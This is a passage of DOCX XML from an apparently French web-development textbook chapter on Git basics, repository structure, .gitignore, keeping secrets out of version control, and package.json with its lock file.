            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Comprendre le rôle de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>package.json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et du fichier de verrouillage.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Distinguer développement et production dans une chaîne de construction.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Automatiser les vérifications avant chaque envoi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>35.1 Git : trois zones, quatre commandes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Git conserve des instantanés. Trois zones coexistent : le répertoire de travail, l'index (les modifications préparées) et le dépôt (les commits).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="45" name="Picture 45"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f43.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.43 — Le trajet d'une modification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le cycle quotidien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git status                     # état des trois zones</w:t>
        <w:br/>
        <w:t>git add index.html styles.css  # préparer des fichiers précis</w:t>
        <w:br/>
        <w:t>git add -p                     # préparer par morceaux</w:t>
        <w:br/>
        <w:t>git commit -m "Ajoute la navigation principale"</w:t>
        <w:br/>
        <w:t>git push origin main</w:t>
        <w:br/>
        <w:t>git log --oneline --graph --decorate -10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.111 — Sept commandes utiles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0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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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255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Quand</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git switch -c nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Créer une branche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nouvelle fonctionnalité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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git switch nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Changer de branche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Retour au tronc</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git merge nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fusionner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intégrer une branche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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git rebase -i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Réécrire l'historique local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Nettoyer avant envoi</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git stash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mettre de côté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Changement d'urgence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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git restore fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Annuler une modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Erreur locale</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Comparer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2554"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Avant de préparer</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COMMIT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Instantané immuable identifié par une empreinte. Il contient l'état des fichiers, l'auteur, la date et le ou les parents.</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UN BON MESSAGE DE COMMIT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>La première ligne résume l'action au présent, en moins de 72 caractères. Le corps explique le pourquoi, pas le comment : le diff montre déjà le comment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un message qui explique la décision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Ajoute la validation accessible du formulaire</w:t>
        <w:br/>
        <w:br/>
        <w:t>Les erreurs sont désormais annoncées dans une zone role="alert"</w:t>
        <w:br/>
        <w:t>et chaque champ reçoit aria-invalid. Le focus se déplace sur</w:t>
        <w:br/>
        <w:t>le résumé après un échec.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Refs: #42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>35.2 Structurer un dépôt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un dépôt lisible distingue les sources, les ressources, les tests et les fichiers générés. Ces derniers ne doivent jamais être versionnés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une arborescence lisible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mon-site/</w:t>
        <w:br/>
        <w:t>├── index.html</w:t>
        <w:br/>
        <w:t>├── a-propos.html</w:t>
        <w:br/>
        <w:t>├── assets/</w:t>
        <w:br/>
        <w:t>│   ├── styles/</w:t>
        <w:br/>
        <w:t>│   │   ├── base.css</w:t>
        <w:br/>
        <w:t>│   │   ├── composants.css</w:t>
        <w:br/>
        <w:t>│   │   └── pages.css</w:t>
        <w:br/>
        <w:t>│   ├── scripts/</w:t>
        <w:br/>
        <w:t>│   └── images/</w:t>
        <w:br/>
        <w:t>├── .gitignore</w:t>
        <w:br/>
        <w:t>├── .editorconfig</w:t>
        <w:br/>
        <w:t>├── package.json</w:t>
        <w:br/>
        <w:t>└── README.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un `.gitignore` de départ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Dépendances et artefacts</w:t>
        <w:br/>
        <w:t>node_modules/</w:t>
        <w:br/>
        <w:t>dist/</w:t>
        <w:br/>
        <w:t>build/</w:t>
        <w:br/>
        <w:br/>
        <w:t># Secrets et configuration locale</w:t>
        <w:br/>
        <w:t>.env</w:t>
        <w:br/>
        <w:t>.env.local</w:t>
        <w:br/>
        <w:br/>
        <w:t># Système et éditeurs</w:t>
        <w:br/>
        <w:t>.DS_Store</w:t>
        <w:br/>
        <w:t>Thumbs.db</w:t>
        <w:br/>
        <w:t>.vscode/</w:t>
        <w:br/>
        <w:t>.idea/</w:t>
        <w:br/>
        <w:br/>
        <w:t># Journaux</w:t>
        <w:br/>
        <w:t>*.log</w:t>
        <w:br/>
        <w:t>npm-debug.log*</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UN SECRET VERSIONNÉ EST UN SECRET COMPROMIS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Même supprimé du fichier, il reste dans l'historique. Si un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.env</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> a été envoyé, révoquez la clé immédiatement, puis nettoyez l'historique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications de sécurité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Vérifier qu'un fichier n'est pas suivi</w:t>
        <w:br/>
        <w:t>git ls-files | grep env</w:t>
        <w:br/>
        <w:br/>
        <w:t># Retirer un fichier du suivi sans le supprimer localement</w:t>
        <w:br/>
        <w:t>git rm --cached .env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">35.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et verrouillage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit le projet et ses dépendances. Le fichier de verrouillage (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>package-lock.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) fige l'arbre exact, ce qui rend les installations reproductibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un manifeste minimal · json</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w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "mon-site",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "version": "1.0.0",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "private": true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "type": "module",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "scripts": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "dev": "vite",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "build": "vite build",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "preview": "vite preview",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "test": "vitest run",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "lint": "eslint ."</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "devDependencies": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "vite": "^5.0.0",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "vitest": "^1.0.0"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Tableau 0.112 — Six champs de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>package.json</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51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Champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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310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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3399"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom du paquet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Minuscules, tirets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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private</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Empêche la publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Indispensable pour un site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3399"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Système de modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>module</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour ESM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Commandes nommées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Point d'entrée de l'automatisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
